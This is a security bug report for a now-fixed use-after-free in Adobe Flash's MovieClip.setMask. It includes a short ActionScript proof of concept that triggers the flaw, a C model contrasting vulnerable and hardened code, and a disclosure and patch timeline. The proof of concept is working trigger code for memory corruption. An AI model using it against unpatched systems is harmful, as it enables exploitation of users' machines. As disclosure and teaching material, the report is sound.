Status: Fixed
Closed: Jul 2015
Adobe Flash: Use-after-free when calling setMask
Project Member Reported by natashenka@google.com, May 15 2015
There is a use-after-free in MovieClip.setMask. A PoC is as follows:

this.createEmptyMovieClip("l1", 1, 1, 1, 10, 10);
this.createEmptyMovieClip("l2", 2, 1, 1, 10, 10);
var thiz = this;
var n = {toString: func};   // toString is script code; it runs while setMask coerces its argument
l2.setMask(n);

function func(){
	var test = thiz.createTextField("test", 2, 1, 1, 10, 10);   // same depth as l2
	test.removeTextField();
	trace("in func");
	return "l1";
}

A swf and fla are attached.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Attachments: setmask.fla (4.6 KB), setmask.swf (720 bytes)
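To make the bug class behind this report concrete from the fixer's side, the following C program is an added model written for this page; it is not Adobe's code and does not reproduce Flash Player internals. It assumes, as the PoC above relies on, that creating an object at an occupied depth replaces the object already there and that a script-defined toString runs while the native method is still coercing its argument. The names Vm, Object, set_mask_vulnerable, set_mask_hardened and the SETMASK_* status codes are invented for the illustration. The vulnerable shape captures a raw pointer to the target before the callback runs and uses it afterwards; the hardened shape coerces every argument first and only then resolves the target by depth, so a removed or replaced object is noticed. Freed slots are flagged rather than reused so the dangling access is reported (SETMASK_UAF) instead of performed.

```c
/* Added illustration (not Adobe's code): a toy AVM1-style display list that
 * models the re-entrancy pattern behind a setMask use-after-free. Freed slots
 * are flagged, never recycled, so a dangling access is reported, not done. */
#include <stdio.h>
#include <string.h>

#define MAX_OBJECTS 8
#define MAX_DEPTH   8

typedef struct Object {
    char name[16];
    int depth;
    int alive;                  /* 0 once removed from the display list */
    struct Object *mask;
} Object;

typedef struct Vm {
    Object pool[MAX_OBJECTS];
    int used;
    Object *display[MAX_DEPTH]; /* assumed model: one object per depth */
} Vm;

/* A script value passed to a native method: a plain string, or an object
 * whose toString is script code that may mutate the display list. */
typedef const char *(*ToStringFn)(Vm *vm);
typedef struct Arg { const char *str; ToStringFn to_string; } Arg;

enum { SETMASK_OK = 0, SETMASK_NO_MASK = 1, SETMASK_TARGET_GONE = 2, SETMASK_UAF = 3 };

static void vm_init(Vm *vm) { memset(vm, 0, sizeof *vm); }

/* Removing a depth frees whatever object occupied it. */
static void vm_remove_depth(Vm *vm, int depth) {
    if (vm->display[depth]) { vm->display[depth]->alive = 0; vm->display[depth] = NULL; }
}

/* Creating at an occupied depth replaces (frees) the old object (assumed). */
static Object *vm_create(Vm *vm, const char *name, int depth) {
    if (vm->used >= MAX_OBJECTS || depth < 0 || depth >= MAX_DEPTH) return NULL;
    vm_remove_depth(vm, depth);
    Object *o = &vm->pool[vm->used++];
    snprintf(o->name, sizeof o->name, "%s", name);
    o->depth = depth; o->alive = 1; o->mask = NULL;
    vm->display[depth] = o;
    return o;
}

static Object *vm_find(Vm *vm, const char *name) {
    for (int d = 0; d < MAX_DEPTH; d++)
        if (vm->display[d] && strcmp(vm->display[d]->name, name) == 0) return vm->display[d];
    return NULL;
}

/* Argument coercion is the re-entry point: script runs here. */
static const char *coerce_to_string(Vm *vm, const Arg *a) {
    return a->to_string ? a->to_string(vm) : a->str;
}

/* Vulnerable shape: capture the target pointer, run script, use the pointer. */
int set_mask_vulnerable(Vm *vm, int target_depth, Arg mask_arg) {
    Object *self = vm->display[target_depth];      /* raw pointer held across script */
    const char *name = coerce_to_string(vm, &mask_arg);
    Object *mask = vm_find(vm, name);
    if (!mask) return SETMASK_NO_MASK;
    if (!self->alive) return SETMASK_UAF;          /* instrumentation: real code would write here */
    self->mask = mask;
    return SETMASK_OK;
}

/* Hardened shape: coerce every argument before touching native state, then
 * re-resolve the target by handle so a replaced or removed object is seen. */
int set_mask_hardened(Vm *vm, int target_depth, Arg mask_arg) {
    const char *name = coerce_to_string(vm, &mask_arg);
    Object *self = vm->display[target_depth];      /* looked up after script ran */
    if (!self) return SETMASK_TARGET_GONE;
    Object *mask = vm_find(vm, name);
    if (!mask) return SETMASK_NO_MASK;
    self->mask = mask;
    return SETMASK_OK;
}

/* toString shaped like the report's PoC: create a text field at the target's
 * depth (replacing it), remove the text field, then name a valid mask. */
static const char *poc_to_string(Vm *vm) {
    vm_create(vm, "test", 2);
    vm_remove_depth(vm, 2);
    return "l1";
}

/* Drives the PoC sequence against one implementation; returns its status. */
int run_scenario(int (*impl)(Vm *, int, Arg)) {
    Vm vm; vm_init(&vm);
    vm_create(&vm, "l1", 1);
    vm_create(&vm, "l2", 2);
    Arg n = { NULL, poc_to_string };
    return impl(&vm, 2, n);
}

/* Plain-string argument: both shapes must apply the mask normally. */
int run_benign(int (*impl)(Vm *, int, Arg)) {
    Vm vm; vm_init(&vm);
    Object *l1 = vm_create(&vm, "l1", 1);
    Object *l2 = vm_create(&vm, "l2", 2);
    Arg n = { "l1", NULL };
    int rc = impl(&vm, 2, n);
    return (rc == SETMASK_OK && l2->mask == l1) ? SETMASK_OK : -1;
}

int main(void) {
    printf("PoC shape: vulnerable=%d hardened=%d (3=UAF, 2=target gone)\n",
           run_scenario(set_mask_vulnerable), run_scenario(set_mask_hardened));
    printf("benign: vulnerable=%d hardened=%d (0=ok)\n",
           run_benign(set_mask_vulnerable), run_benign(set_mask_hardened));
    return 0;
}
```

run_scenario mirrors the PoC's order of events (l1 at depth 1, l2 at depth 2, a toString that creates and removes a text field at depth 2 and then names l1); run_benign passes a plain string and checks that the mask is actually applied, which shows the hardened ordering does not change behaviour in the non-re-entrant case. The general rule the hardened version follows is to finish all script-visible coercions before reading native object state, and to hold targets by a handle that can be re-validated rather than by a raw pointer.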
Project Member Comment 1 by natashenka@google.com, May 18 2015
This is PSIRT-3715
Comment 2 by cevans@google.com, Jul 5 2015
Labels: CVE-2015-4428
Comment 3 by cevans@google.com, Jul 9 2015
Labels: Fixed-2015-Jul-8
Status: Fixed
Fixed: https://helpx.adobe.com/security/products/flash-player/apsb15-16.html
Project Member Comment 4 by natashenka@google.com, Aug 3 2015
Labels: -Restrict-View-Commit